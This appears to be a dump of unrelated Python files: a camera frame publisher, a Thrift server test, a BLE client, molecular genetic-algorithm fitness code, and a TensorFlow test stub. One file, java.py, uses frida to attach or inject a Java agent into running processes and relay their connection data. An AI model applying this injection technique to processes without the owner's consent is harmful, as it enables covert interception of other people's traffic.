(flag, encodedImage) = cv2.imencode(".jpg", x)
ebytes = encodedImage.tobytes()
try:
self.publish_data.send_multipart([self.service.identity + b'.data', framenum, ebytes], copy=False)
except Exception as e:
print(f'Publish CamPV Exception {str(e)}', flush=True)
# pass
self.ready = True
def _on_mon(self, msg):
print("MONITOR SOCKET", msg)
ev = zmq.utils.monitor.parse_monitor_message(msg)
event = ev['event']
endpoint = ev['endpoint']
if event == zmq.EVENT_CONNECTED:
print(f"CONNECTED {endpoint}")
pass
elif event == zmq.EVENT_DISCONNECTED:
print(f"DISCONNECTED {endpoint}")
pass
def stop(self, *args):
self.running = False
self.close()
def close(self, *args):
self.state.status = "closed"
def cancel(self):
self.state.status = "cancelled"
def finished(self):
self.state.status = "finished"
def pause(self):
self.flush_callback.stop()
def resume(self):
self.flush_callback.start()
# self.state.status = "paused"
def get_state(self):
self.service.fire_event(Camera.recording.state.changed, self.state)
|
TestCppServer.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# this interferes with ServiceRouter/SWIG
# @lint-avoid-python-3-compatibility-imports
#from __future__ import unicode_literals
import multiprocessing
import sys
import threading
import time
from fb303.ContextFacebookBase import FacebookBase
from libfb.testutil import BaseFacebookTestCase
from thrift.transport import TSocket, TTransport
from thrift.protocol import TBinaryProtocol
from thrift.Thrift import TProcessorEventHandler
from thrift.server.TCppServer import TCppServer
from thrift.server.TServer import TServerEventHandler
from tools.test.stubs import fbpyunit
from test.sleep import SleepService, ttypes
TIMEOUT = 60 * 1000 # milliseconds
def getClient(addr):
transport = TSocket.TSocket(addr[0], addr[1])
transport = TTransport.TFramedTransport(transport)
protocol = TBinaryProtocol.TBinaryProtocol(transport)
client = SleepService.Client(protocol)
transport.open()
return client
class SleepProcessorEventHandler(TProcessorEventHandler):
def getHandlerContext(self, fn_name, server_context):
self.last_peer_name = server_context.getPeerName()
self.last_sock_name = server_context.getSockName()
class SleepHandler(FacebookBase, SleepService.Iface):
def __init__(self, noop_event):
FacebookBase.__init__(self, "sleep")
self.noop_event = noop_event
def sleep(self, seconds):
print("server sleeping...")
time.sleep(seconds)
print("server sleeping... done")
def space(self, s):
if isinstance(s, bytes):
s = s.decode('latin1')
return " ".join(s)
def noop(self):
self.noop_event.set()
class SpaceProcess(multiprocessing.Process):
def __init__(self, addr):
self.queue = multiprocessing.Queue()
multiprocessing.Process.__init__(
self, target=self.target, args=(self.queue,))
self.addr = addr
def target(self, queue):
client = getClient(self.addr)
hw = "hello, world"
hw_spaced = "h e l l o , w o r l d"
result = client.space(hw)
if isinstance(result, bytes):
result = result.decode('latin1')
assert result == hw_spaced
queue.put((client._iprot.trans.getTransport().getSocketName(),
client._iprot.trans.getTransport().getPeerName()))
class ParallelProcess(multiprocessing.Process):
def __init__(self, addr):
multiprocessing.Process.__init__(self)
self.addr = addr
def run(self):
clients = []
for i in range(0, 4):
clients.append(getClient(self.addr))
for c in clients:
c.send_sleep(3)
for c in clients:
c.recv_sleep()
class OnewayProcess(multiprocessing.Process):
def __init__(self, addr):
multiprocessing.Process.__init__(self)
self.addr = addr
def run(self):
client = getClient(self.addr)
client.noop()
class TestServerEventHandler(TServerEventHandler):
def __init__(self):
self.connCreated = 0
self.connDestroyed = 0
def newConnection(self, context):
self.connCreated += 1
def connectionDestroyed(self, context):
self.connDestroyed += 1
class TestServer(BaseFacebookTestCase):
def setUp(self):
super(TestServer, self).setUp()
self.noop_event = threading.Event()
processor = SleepService.Processor(SleepHandler(self.noop_event))
self.event_handler = SleepProcessorEventHandler()
processor.setEventHandler(self.event_handler)
self.serverEventHandler = TestServerEventHandler()
self.server = TCppServer(processor)
self.server.setServerEventHandler(self.serverEventHandler)
self.addCleanup(self.stopServer)
# Let the kernel choose a port.
self.server.setPort(0)
self.server_thread = threading.Thread(target=self.server.serve)
self.server_thread.start()
for t in range(30):
addr = self.server.getAddress()
if addr:
break
time.sleep(0.1)
self.assertTrue(addr)
self.server_addr = addr
def stopServer(self):
if self.server:
self.server.stop()
self.server = None
def testSpace(self):
space = SpaceProcess(self.server_addr)
space.start()
client_sockname, client_peername = space.queue.get()
space.join()
self.stopServer()
self.assertEquals(space.exitcode, 0)
self.assertEquals(self.event_handler.last_peer_name, client_sockname)
self.assertEquals(self.event_handler.last_sock_name, client_peername)
self.assertEquals(self.serverEventHandler.connCreated, 1)
self.assertEquals(self.serverEventHandler.connDestroyed, 1)
def testParallel(self):
parallel = ParallelProcess(self.server_addr)
parallel.start()
start_time = time.time()
# this should take about 3 seconds. In practice on an unloaded
# box, it takes about 3.6 seconds.
parallel.join()
duration = time.time() - start_time
print("total time = {}".format(duration))
self.stopServer()
self.assertEqual(parallel.exitcode, 0)
self.assertLess(duration, 5)
def testOneway(self):
oneway = OnewayProcess(self.server_addr)
oneway.start()
oneway.join()
self.stopServer()
self.assertTrue(self.noop_event.wait(5))
if __name__ == '__main__':
rc = fbpyunit.MainProgram(sys.argv).run()
sys.exit(rc)
|
java.py
|
import logging
import os.path
import socketserver
import struct
import subprocess
import sys
import threading
from hmac import compare_digest
from secrets import token_urlsafe
import frida
from hallucinate.handler import RequestHandler
from hallucinate.handlers.logging import LoggingHandler
class JavaAgentHandler(socketserver.BaseRequestHandler):
def read_bytes(self, n):
r = b''
while len(r) < n:
r += self.request.recv(n - len(r))
return r
def read_string(self):
length, = struct.unpack(">H", self.read_bytes(2))
return self.request.recv(length).decode('utf-8')
def read_entry(self):
return self.read_string(), self.read_string()
def handle(self):
key = self.read_string()
if not compare_digest(key, self.server.key):
logging.warning("Client provided wrong key")
self.request.close()
return
while True:
r = self.read_bytes(4)
nentries, = struct.unpack('>I', r)
rdata = dict()
for i in range(nentries):
k, v = self.read_entry()
rdata[k] = v
# emulate conn entry, no nested array support
rdata['conn'] = {
'l': {'ip': rdata['localAddr'], 'port': int(rdata['localPort'])},
'r': {'ip': rdata['remoteAddr'], 'port': int(rdata['remotePort'])}
}
logging.debug('Received request from Java agent: %s', rdata)
def rhandle(data):
logging.debug('Sending response to Java agent: %s', data)
p = struct.pack('>I', len(data))
for k, v in data.items():
ke = str(k).encode('utf-8')
ve = str(v).encode('utf-8')
p += struct.pack('>H', len(ke)) + ke
p += struct.pack('>H', len(ve)) + ve
self.request.sendall(p)
self.server.handler(rdata, rhandle)
class JavaAgentServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
allow_reuse_address = True
block_on_close = False
def __init__(self, host, port, handler, key):
super(JavaAgentServer, self).__init__((host, port), JavaAgentHandler)
self.handler = handler
self.key = key
def test_handler(r, rhandle):
rhandle({'decision': 'ignore'})
def start_server(handler, host='localhost', port=0, key=None):
if key is None:
key = token_urlsafe(32)
server = JavaAgentServer(host, port, lambda d, r: handler.handle_payload(d, r), key)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
if port == 0:
port = server.socket.getsockname()[1]
return server, key, host, port
def stop_server(s):
s.server_close()
def java_attach(pid, agentcfg, java='java', agentjar=None):
if agentjar is None:
agentjar = os.path.dirname(os.path.realpath(__file__)) + os.sep + 'hallucinate-java-all.jar'
subprocess.run([
java, '-cp',
agentjar,
'gs.sy.m8.hallucinate.Launcher', str(pid), agentcfg
], stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
_javaserver = None
_agentcfg = None
def java_attach_runtime(pid, h, args):
global _javaserver, _agentcfg
if _javaserver is not None:
logging.warning("Java server can only be initialized once")
return
logging.info('Java process detected, starting server')
s, key, host, port = start_server(h, host=args.javaagenthost, port=args.javaagentport, key=args.javaagentkey)
debug = ''
if args.verbose > 1:
debug = 'debug;'
_agentcfg = '%sserverport=%d;serveraddr=%s;serverkey=%s' % (debug, port, host, key)
# need to resume, otherwise attach fails
try:
frida.resume(pid)
except frida.InvalidArgumentError as e:
logging.debug('Failed to resume process', exc_info=e)
pass
_javaserver = s
logging.info('Attaching to target process %d with args %s', pid, _agentcfg)
java_attach(pid, _agentcfg,
java=args.javavm,
agentjar=args.agentjar)
def java_attach_startup(cmdline, h, args):
global _javaserver, _agentcfg
if _javaserver is not None:
logging.warning("Java server can only be initialized once")
return
logging.info('Injecting agent during Java launch, starting server')
s, key, host, port = start_server(h, host=args.javaagenthost, port=args.javaagentport, key=args.javaagentkey)
debug = ''
if args.verbose > 1:
debug = 'debug;'
_agentcfg = '%sserverport=%d;serveraddr=%s;serverkey=%s' % (debug, port, host, key)
agentjar = args.agentjar
if agentjar is None:
agentjar = os.path.dirname(os.path.realpath(__file__)) + os.sep + 'hallucinate-java-all.jar'
return [cmdline[0], '-javaagent:' + agentjar + '=' + _agentcfg] + cmdline[1:]
def java_stop():
global _javaserver
if _javaserver is not None:
stop_server(_javaserver)
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
s, key, host, port = start_server(RequestHandler(LoggingHandler('JAVA')))
agentcfg = 'debug;serverport=%d;serveraddr=%s;serverkey=%s' % (port, host, key)
pid = int(sys.argv[1])
java_attach(pid, agentcfg)
sys.stdin.read()
stop_server(s)
|
bleConnection.py
|
from email import message
from bluepy import btle
import threading
import time
message = "FiresMessage"
class MyDelegate(btle.DefaultDelegate):
def __init__(self):
btle.DefaultDelegate.__init__(self)
# ... initialise here
def handleNotification(self, cHandle, data):
global message
message = data
# ... perhaps check cHandle
# ... process 'data'
# Initialisation -------
class BleConnection:
def __init__(self, mac_addres, on_message_receive):
self.p = btle.Peripheral(mac_addres,btle.ADDR_TYPE_PUBLIC)
self.on_message_receive = on_message_receive
# Setup to turn notifications on, e.g.
self.svc = self.p.getServiceByUUID(0xec00)
self.ch_Tx = self.svc.getCharacteristics(0xec0e)[0]
self.ch_Rx = self.svc.getCharacteristics(0xec0e)[0]
self.p.setDelegate(MyDelegate())
self.p.setMTU(512)
self.setup_data = b"\x01\00"
self.p.writeCharacteristic(self.ch_Rx.valHandle+1, self.setup_data)
self.notification_thread = threading.Thread(target=self.get_notification)
self.notification_thread.start()
def get_notification(self):
global message
while True:
try:
if self.p.waitForNotifications(1.0):
self.on_message_receive(message)
except:
time.sleep(0.2)
def write(self, message):
btime = bytes(message , 'utf-8')
try:
return self.ch_Tx.write(btime, True)
except btle.BTLEException:
return "btle.BTLEException"
# Perhaps do something else here
|
generation_props.py
|
'''
Functions that are used while a Generation is being Evaluated
'''
import os
import multiprocessing
from rdkit import Chem
import numpy as np
from random import randrange
import discriminator as D
import evolution_functions as evo
from SAS_calculator.sascorer import calculateScore
manager = multiprocessing.Manager()
lock = multiprocessing.Lock()
def calc_prop_logP(unseen_smile_ls, property_name, props_collect):
'''Calculate logP for each molecule in unseen_smile_ls, and record results
in locked dictionary props_collect
'''
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile)
if did_convert: # ensure valid smile
props_collect[property_name][smile] = evo.get_logP(mol) # Add calculation
else:
raise Exception('Invalid smile encountered while atempting to calculate logP')
def calc_prop_SAS(unseen_smile_ls, property_name, props_collect):
'''Calculate synthetic accesibility score for each molecule in unseen_smile_ls,
results are recorded in locked dictionary props_collect
'''
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile)
if did_convert: # ensure valid smile
props_collect[property_name][smile] = calculateScore(mol)
else:
raise Exception('Invalid smile encountered while atempting to calculate SAS')
def calc_prop_RingP(unseen_smile_ls, property_name, props_collect):
'''Calculate Ring penalty for each molecule in unseen_smile_ls,
results are recorded in locked dictionary props_collect
'''
for smi in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smi)
if did_convert:
cycle_list = mol.GetRingInfo().AtomRings()
if len(cycle_list) == 0:
cycle_length = 0
else:
cycle_length = max([ len(j) for j in cycle_list ])
if cycle_length <= 6:
cycle_length = 0
else:
cycle_length = cycle_length - 6
props_collect[property_name][smi] = cycle_length
else:
raise Exception('Invalid smile encountered while atempting to calculate Ring penalty')
def create_parr_process(chunks, property_name):
''' Create parallel processes for calculation of properties
'''
# Assign data to each process
process_collector = []
collect_dictionaries = []
for item in chunks:
props_collect = manager.dict(lock=True)
smiles_map_ = manager.dict(lock=True)
props_collect[property_name] = smiles_map_
collect_dictionaries.append(props_collect)
if property_name == 'logP':
process_collector.append(multiprocessing.Process(target=calc_prop_logP, args=(item, property_name, props_collect, )))
if property_name == 'SAS':
process_collector.append(multiprocessing.Process(target=calc_prop_SAS, args=(item, property_name, props_collect, )))
if property_name == 'RingP':
process_collector.append(multiprocessing.Process(target=calc_prop_RingP, args=(item, property_name, props_collect, )))
for item in process_collector:
item.start()
for item in process_collector: # wait for all parallel processes to finish
item.join()
combined_dict = {} # collect results from multiple processess
for i,item in enumerate(collect_dictionaries):
combined_dict.update(item[property_name])
return combined_dict
def fitness(molecules_here, properties_calc_ls,
discriminator, disc_enc_type, generation_index,
max_molecules_len, device, num_processors, writer, beta,
data_dir, max_fitness_collector, impose_time_adapted_pen):
''' Calculate fitness fo a generation in the GA
All properties are standardized based on the mean & stddev of the zinc dataset
Parameters:
molecules_here (list) : List of a string of molecules
properties_calc_ls : Type of property to be shown to the descriminator
discriminator (torch.Model) : Pytorch classifier
disc_enc_type (string) : Indicated type of encoding shown to discriminator
generation_index (int) : Which generation indicator
max_molecules_len (int) : Largest mol length
device (string) : Device of discrimnator
num_processors (int) : Number of cpu processors to parallelize over
writer (tensorboardX writer obj) : Tensorboard graphing tool
beta (int) : Discriminator fitness parameter
data_dir (str) : Directory for saving data
max_fitness_collector (list) : List for collecting max fitness values
impose_time_adapted_pen (bool) : Impose time-adaptive discriminator penalty?
Returns:
fitness (np.array) : A lin comb of properties and
discriminator predictions
discriminator_predictions (np.array) : The predictions made by the discrimantor
'''
dataset_x = evo.obtain_discr_encoding(molecules_here, disc_enc_type, max_molecules_len, num_processors, generation_index)
if generation_index == 1:
discriminator_predictions = np.zeros((len(dataset_x),1))
else:
discriminator_predictions = D.do_predictions(discriminator, dataset_x, device)
if properties_calc_ls == None:
fitness = discriminator_predictions
else:
molecules_here_unique = list(set(molecules_here))
ratio = len(molecules_here_unique) / num_processors
chunks = evo.get_chunks(molecules_here_unique, num_processors, ratio)
chunks = [item for item in chunks if len(item) >= 1]
logP_results, SAS_results, ringP_results, QED_results = {}, {}, {}, {}
# Parallelize the calculation of logPs
if 'logP' in properties_calc_ls:
logP_results = create_parr_process(chunks, 'logP')
# Parallelize the calculation of SAS
if 'SAS' in properties_calc_ls:
SAS_results = create_parr_process(chunks, 'SAS')
# Parallize the calculation of Ring Penalty
if 'RingP' in properties_calc_ls:
ringP_results = create_parr_process(chunks, 'RingP')
if 'QED' in properties_calc_ls:
QED_results = {}
for smi in molecules_here:
QED_results[smi] = Chem.QED.qed(Chem.MolFromSmiles(smi))
logP_calculated, SAS_calculated, RingP_calculated, logP_norm, SAS_norm, RingP_norm, QED_results = obtained_standardized_properties(molecules_here, logP_results, SAS_results, ringP_results, QED_results, properties_calc_ls)
# Add SAS and Ring Penalty
# Note: The fitness function must include the properties of var. 'properties_calc_ls'
fitness = (logP_norm) - (SAS_norm) - (RingP_norm)
# Plot fitness without discriminator
writer.add_scalar('max fitness without discr', max(fitness), generation_index)
writer.add_scalar('avg fitness without discr', fitness.mean(), generation_index)
max_fitness_collector.append(max(fitness)[0])
## Impose the beta cuttoff! --------------------------
if impose_time_adapted_pen:
if generation_index > 100:
if len(set(max_fitness_collector[-5:])) == 1: # Check if there is a sagnation for 5 generations!
beta = 1000
print('Beta cutoff imposed index: ', generation_index)
f = open('{}/beta_change_log.txt'.format(data_dir), 'a+')
f.write(str(generation_index) + '\n')
f.close()
## beta cuttoff imposed! --------------------------
# max fitness without discriminator
f = open('{}/max_fitness_no_discr.txt'.format(data_dir), 'a+')
f.write(str(max(fitness)[0]) + '\n')
f.close()
# avg fitness without discriminator
f = open('{}/avg_fitness_no_discr.txt'.format(data_dir), 'a+')
f.write(str(fitness.mean()) + '\n')
f.close()
print('beta value: ', beta)
fitness = (beta * discriminator_predictions) + fitness
# Plot fitness with discriminator
writer.add_scalar('max fitness with discrm', max(fitness), generation_index)
writer.add_scalar('avg fitness with discrm', fitness.mean(), generation_index)
# max fitness with discriminator
f = open('{}/max_fitness_discr.txt'.format(data_dir), 'a+')
f.write(str(max(fitness)[0]) + '\n')
f.close()
# avg fitness with discriminator
f = open('{}/avg_fitness_discr.txt'.format(data_dir), 'a+')
f.write(str(fitness.mean()) + '\n')
f.close()
# Plot properties
writer.add_scalar('non standr max logp', max(logP_calculated), generation_index) # logP plots
writer.add_scalar('non standr mean logp', logP_calculated.mean(), generation_index)
writer.add_scalar('non standr min sas', min(SAS_calculated), generation_index) # SAS plots
writer.add_scalar('non standr mean sas', SAS_calculated.mean(), generation_index)
writer.add_scalar('non standr min ringp', min(RingP_calculated), generation_index) # RingP plots
writer.add_scalar('non standr mean ringp', RingP_calculated.mean(), generation_index)
# max logP - non standardized
f = open('{}/max_logp.txt'.format(data_dir), 'a+')
f.write(str(max(logP_calculated)) + '\n')
f.close()
# mean logP - non standardized
f = open('{}/avg_logp.txt'.format(data_dir), 'a+')
f.write(str(logP_calculated.mean()) + '\n')
f.close()
# min SAS - non standardized
f = open('{}/min_SAS.txt'.format(data_dir), 'a+')
f.write(str(min(SAS_calculated)) + '\n')
f.close()
# mean SAS - non standardized
f = open('{}/avg_SAS.txt'.format(data_dir), 'a+')
f.write(str(SAS_calculated.mean()) + '\n')
f.close()
# min RingP - non standardized
f = open('{}/min_RingP.txt'.format(data_dir), 'a+')
f.write(str(min(RingP_calculated)) + '\n')
f.close()
# mean RingP - non standardized
f = open('{}/avg_RingP.txt'.format(data_dir), 'a+')
f.write(str(RingP_calculated.mean()) + '\n')
f.close()
return fitness, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions
def obtained_standardized_properties(molecules_here, logP_results, SAS_results, ringP_results, QED_results, properties_calc_ls):
''' Obtain calculated properties of molecules in molecules_here, and standardize
values base on properties of the Zinc Data set.
'''
logP_calculated = []
SAS_calculated = []
RingP_calculated = []
QED_calculated = []
for smi in molecules_here:
if 'logP' in properties_calc_ls:
logP_calculated.append(logP_results[smi])
if 'SAS' in properties_calc_ls:
SAS_calculated.append(SAS_results[smi])
if 'RingP' in properties_calc_ls:
RingP_calculated.append(ringP_results[smi])
if 'QED' in properties_calc_ls:
QED_calculated.append(QED_results[smi])
logP_calculated = np.array(logP_calculated)
SAS_calculated = np.array(SAS_calculated)
RingP_calculated = np.array(RingP_calculated)
QED_calculated = np.array(QED_calculated)
# Standardize logP based on zinc logP (mean: 2.4729421499641497 & std : 1.4157879815362406)
logP_norm = (logP_calculated - 2.4729421499641497) / 1.4157879815362406
logP_norm = logP_norm.reshape((logP_calculated.shape[0], 1))
# Standardize SAS based on zinc SAS(mean: 3.0470797085649894 & std: 0.830643172314514)
SAS_norm = (SAS_calculated - 3.0470797085649894) / 0.830643172314514
SAS_norm = SAS_norm.reshape((SAS_calculated.shape[0], 1))
# Standardiize RingP based on zinc RingP(mean: 0.038131530820234766 & std: 0.2240274735210179)
RingP_norm = (RingP_calculated - 0.038131530820234766) / 0.2240274735210179
RingP_norm = RingP_norm.reshape((RingP_calculated.shape[0], 1))
return logP_calculated, SAS_calculated, RingP_calculated, logP_norm, SAS_norm, RingP_norm, QED_calculated
def obtain_fitness(disc_enc_type, smiles_here, selfies_here, properties_calc_ls,
discriminator, generation_index, max_molecules_len, device,
generation_size, num_processors, writer, beta, image_dir,
data_dir, max_fitness_collector, impose_time_adapted_pen):
''' Obtain fitness of generation based on choices of disc_enc_type.
Essentially just calls 'fitness'
'''
# ANALYSE THE GENERATION
if disc_enc_type == 'smiles' or disc_enc_type == 'properties_rdkit':
fitness_here, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions = fitness(smiles_here, properties_calc_ls , discriminator,
disc_enc_type, generation_index, max_molecules_len, device, num_processors, writer, beta, data_dir, max_fitness_collector, impose_time_adapted_pen)
elif disc_enc_type == 'selfies':
fitness_here, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions = fitness(selfies_here, properties_calc_ls , discriminator,
disc_enc_type, generation_index, max_molecules_len, device, num_processors, writer, beta, data_dir, max_fitness_collector, impose_time_adapted_pen)
fitness_here = fitness_here.reshape((generation_size, ))
order, fitness_ordered, smiles_ordered, selfies_ordered = order_based_on_fitness(fitness_here, smiles_here, selfies_here)
# Order molecules based on ordering of 'smiles_ordered'
logP_calculated = [logP_calculated[idx] for idx in order]
SAS_calculated = [SAS_calculated[idx] for idx in order]
RingP_calculated = [RingP_calculated[idx] for idx in order]
discriminator_predictions = [discriminator_predictions[idx] for idx in order]
os.makedirs('{}/{}'.format(data_dir, generation_index))
# Write ordered smiles in a text file
f = open('{}/{}/smiles_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in smiles_ordered])
f.close()
# Write logP of ordered smiles in a text file
f = open('{}/{}/logP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in logP_calculated])
f.close()
# Write sas of ordered smiles in a text file
f = open('{}/{}/sas_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in SAS_calculated])
f.close()
# Write ringP of ordered smiles in a text file
f = open('{}/{}/ringP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in RingP_calculated])
f.close()
# Write discriminator predictions of ordered smiles in a text file
f = open('{}/{}/discrP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in discriminator_predictions])
f.close()
# Add the average & max discriminator score of a generation
writer.add_scalar('mean discriminator score', np.array(discriminator_predictions).mean(), generation_index)
writer.add_scalar('max discriminator score', max(discriminator_predictions), generation_index)
f = open('{}/avg_discr_score.txt'.format(data_dir), 'a+')
f.write(str(np.array(discriminator_predictions).mean()) + '\n')
f.close()
f = open('{}/max_discr_score.txt'.format(data_dir), 'a+')
f.write(str(max(discriminator_predictions)[0]) + '\n')
f.close()
#print statement for the best molecule in the generation
# print('Best best molecule in generation ', generation_index)
# print(' smile : ', smiles_ordered[0])
# print(' fitness: ', fitness_ordered[0])
# print(' logP : ', logP_calculated[0])
# print(' sas : ', SAS_calculated[0])
# print(' ringP : ', RingP_calculated[0])
# print(' discrm : ', discriminator_predictions[0])
f = open('{}/best_in_generations.txt'.format(data_dir), 'a+')
best_gen_str = 'index: {}, smile: {}, fitness: {}, logP: {}, sas: {}, ringP: {}, discrm: {}'.format(generation_index, smiles_ordered[0], fitness_ordered[0], logP_calculated[0], SAS_calculated[0], RingP_calculated[0], discriminator_predictions[0])
f.write(best_gen_str + '\n')
f.close()
show_generation_image(generation_index, image_dir, smiles_ordered, fitness_ordered, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions)
return fitness_here, order, fitness_ordered, smiles_ordered, selfies_ordered
def show_generation_image(generation_index, image_dir, smiles_ordered, fitness, logP, SAS, RingCount, discr_scores):
''' Plot 100 molecules with the best fitness in in a generation
Called after at the end of each generation. Image in each generation
is stored with name 'generation_index.png'
Images are stored in diretory './images'
'''
if generation_index > 1:
A = list(smiles_ordered)
A = A[:100]
if len(A) < 100 : return #raise Exception('Not enough molecules provided for plotting ', len(A))
A = [Chem.MolFromSmiles(x) for x in A]
evo.create_100_mol_image(A, "./{}/{}_ga.png".format(image_dir, generation_index), fitness, logP, SAS, RingCount, discr_scores)
def obtain_previous_gen_mol(starting_smiles, starting_selfies, generation_size,
generation_index, selfies_all, smiles_all):
'''Obtain molecules from one generation prior.
If generation_index is 1, only the the starting molecules are returned
Parameters:
Returns:
'''
# Obtain molecules from the previous generation
if generation_index == 1:
randomized_smiles = []
randomized_selfies = []
for i in range(generation_size): # nothing to obtain from previous gen
# So, choose random moleclues from the starting list
index = randrange(len(starting_smiles))
randomized_smiles.append(starting_smiles[index])
randomized_selfies.append(starting_selfies[index])
return randomized_smiles, randomized_selfies
else:
return smiles_all[generation_index-2], selfies_all[generation_index-2]
def order_based_on_fitness(fitness_here, smiles_here, selfies_here):
'''Order elements of a lists (args) based om Decreasing fitness
'''
order = np.argsort(fitness_here)[::-1] # Decreasing order of indices, based on fitness
fitness_ordered = [fitness_here[idx] for idx in order]
smiles_ordered = [smiles_here[idx] for idx in order]
selfies_ordered = [selfies_here[idx] for idx in order]
return order, fitness_ordered, smiles_ordered, selfies_ordered
def apply_generation_cutoff(order, generation_size):
''' Return of a list of indices of molecules that are kept (high fitness)
and a list of indices of molecules that are replaced (low fitness)
The cut-off is imposed using a Fermi-Function
Parameters:
order (list) : list of molecule indices arranged in Decreasing order of fitness
generation_size (int) : number of molecules in a generation
Returns:
to_replace (list): indices of molecules that will be replaced by random mutations of
molecules in list 'to_keep'
to_keep (list): indices of molecules that will be kept for the following generations
'''
# Get the probabilities that a molecule with a given fitness will be replaced
# a fermi function is used to smoothen the transition
positions = np.array(range(0, len(order))) - 0.2*float(len(order))
probabilities = 1.0 / (1.0 + np.exp(-0.02 * generation_size * positions / float(len(order))))
# import matplotlib.pyplot as plt
# plt.plot(positions, probabilities)
# plt.show()
to_replace = [] # all molecules that are replaced
to_keep = [] # all molecules that are kept
for idx in range(0,len(order)):
if np.random.rand(1) < probabilities[idx]:
to_replace.append(idx)
else:
to_keep.append(idx)
return to_replace, to_keep
def obtain_next_gen_molecules(order, to_replace, to_keep,
selfies_ordered, smiles_ordered, max_molecules_len):
''' Obtain the next generation of molecules. Bad molecules are replaced by
mutations of good molecules
Parameters:
order (list) : list of molecule indices arranged in Decreasing order of fitness
to_replace (list) : list of indices of molecules to be replaced by random mutations of better molecules
to_keep (list) : list of indices of molecules to be kept in following generation
selfies_ordered (list) : list of SELFIE molecules, ordered by fitness
smiles_ordered (list) : list of SMILE molecules, ordered by fitness
max_molecules_len (int) : length of largest molecule
Returns:
smiles_mutated (list): next generation of mutated molecules as SMILES
selfies_mutated(list): next generation of mutated molecules as SELFIES
'''
smiles_mutated = []
selfies_mutated = []
for idx in range(0,len(order)):
if idx in to_replace: # smiles to replace (by better molecules)
random_index=np.random.choice(to_keep, size=1, replace=True, p=None)[0] # select a random molecule that survived
grin_new, smiles_new = evo.mutations_random_grin(selfies_ordered[random_index], max_molecules_len) # do the mutation
# add mutated molecule to the population
smiles_mutated.append(smiles_new)
selfies_mutated.append(grin_new)
else: # smiles to keep
smiles_mutated.append(smiles_ordered[idx])
selfies_mutated.append(selfies_ordered[idx])
return smiles_mutated, selfies_mutated
def obtain_discrm_data(disc_enc_type, molecules_reference, smiles_mutated, selfies_mutated, max_molecules_len, num_processors, generation_index):
'''Obtain data that will be used to train the discriminator (inputs & labels)
'''
if disc_enc_type == 'smiles':
random_dataset_selection = np.random.choice(list(molecules_reference.keys()), size=len(smiles_mutated)).tolist()
dataset_smiles = smiles_mutated + random_dataset_selection # Generation smiles + Dataset smiles
dataset_x = evo._to_onehot(dataset_smiles, disc_enc_type, max_molecules_len)
dataset_y = np.array([1 if x in molecules_reference else 0 for x in smiles_mutated] +
[1 for i in range(len(dataset_smiles)-len(smiles_mutated))])
elif disc_enc_type == 'selfies':
random_dataset_selection = np.random.choice(list(molecules_reference.keys()), size=len(selfies_mutated)).tolist()
dataset_smiles = selfies_mutated + random_dataset_selection
dataset_x = evo._to_onehot(dataset_smiles, disc_enc_type, max_molecules_len)
dataset_y = np.array([1 if x in molecules_reference else 0 for x in selfies_mutated] +
[1 for i in range(len(dataset_smiles)-len(selfies_mutated))])
elif disc_enc_type == 'properties_rdkit':
random_dataset_selection = np.random.choice(list(molecules_reference.keys()), size=len(smiles_mutated)).tolist()
dataset_smiles = smiles_mutated + random_dataset_selection # Generation smiles + Dataset smiles
dataset_x = evo.obtain_discr_encoding(dataset_smiles, disc_enc_type, max_molecules_len, num_processors, generation_index)
dataset_y = np.array([1 if x in molecules_reference else 0 for x in smiles_mutated] +
[1 for i in range(len(dataset_smiles)-len(selfies_mutated))])
# Shuffle training data
order_training = np.array(range(len(dataset_smiles))) #np.arange(len(dataset_smiles))
np.random.shuffle(order_training)
dataset_x = dataset_x[order_training]
dataset_y = dataset_y[order_training]
return dataset_x, dataset_y
def update_gen_res(smiles_all, smiles_mutated, selfies_all, selfies_mutated, smiles_all_counter):
'''Collect results that will be shared with global variables outside generations
'''
smiles_all.append(smiles_mutated)
selfies_all.append(selfies_mutated)
for smi in smiles_mutated:
if smi in smiles_all_counter:
smiles_all_counter[smi] += 1
else:
smiles_all_counter[smi] = 1
return smiles_all, selfies_all, smiles_all_counter
|
coordinator_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Coordinator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import threading
import time
import tensorflow as tf
def StopOnEvent(coord, wait_for_stop, set_when_stopped):
wait_for_stop.wait()
coord.request_stop()
set_when_stopped.set()
def RaiseInN(coord, n_secs, ex, report_exception):
try:
time.sleep(n_secs)
raise ex
except RuntimeError as e:
if report_exception:
coord.request_stop(e)
else:
coord.request_stop(sys.exc_info())
def RaiseInNUsingContextHandler(coord, n_secs, ex):
with coord.stop_on_exception():
time.sleep(n_secs)
raise ex
def SleepABit(n_secs, coord=None):
if coord:
coord.register_thread(threading.current_thread())
time.sleep(n_secs)
def WaitForThreadsToRegister(coord, num_threads):
while True:
with coord._lock:
if len(coord._registered_threads) == num_threads:
break
time.sleep(0.001)
class CoordinatorTest(tf.test.TestCase):
